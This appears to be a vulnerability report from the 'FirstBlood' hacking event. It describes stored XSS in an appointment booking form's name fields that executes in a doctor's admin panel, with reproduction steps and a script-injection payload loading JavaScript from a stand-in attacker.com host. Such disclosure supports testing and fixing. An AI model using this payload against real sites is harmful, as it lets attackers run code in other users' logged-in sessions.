FirstBlood-#284Cross Site Scripting vulnerability in client firstname/lastname



On 2021-05-15, YouGina reported:

Summary

Using the form to create an appointment (located at endpoint /book-appointment.html) it is possible to inject an XSS payload which will trigger on one of the endpoints in the backend panel. This form sends a post request to the endpoint /api/ba.php. The Firstname and Lastname fields are vulnerable. In the post request these are the fname and lname parameters.

Steps to reproduce

Make sure a proxy is running in the background, or keep developer tools in the browser open on the network tap.

  1. Open the book-appointment.html page
  2. Fill in all the fields normally
  3. Replace the firstname and lastname fields with the payload: <script/src="//attacker.com/script.js"></script/onerror> (Replace the url with a Javascript file on an URL that you control)
  4. Submit the form
  5. Now login as a docter and click the latest added appointment.
  6. Go to the proxy, or the network tab in developer tools of the browser and find the latest request.
  7. Open this url in the browser

The javascript on the provided URL should now have executed. See attached screenshot as an example output:

The payload I used for that Proof of Concept is:

alert("PoC - [email protected]\rdocument.domain: " + document.domain + "\rlocation.origin: " + location.origin);

Impact

It is possible to execute any JavaScript in the context of the logged in user (in this case drAdmin).

P2 High

Endpoint: /drpanel/drapi/query.php?aptid={appointmentid}

Parameter: fname and lname

Payload: <script/src="//attacker.com/script.js"></script/onerror>


FirstBlood ID: 10
Vulnerability Type: Stored XSS

When creating an appointment, it is possible to get stored XSS /drapi/query.php via the patients name


Respect Earnt: 1500000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.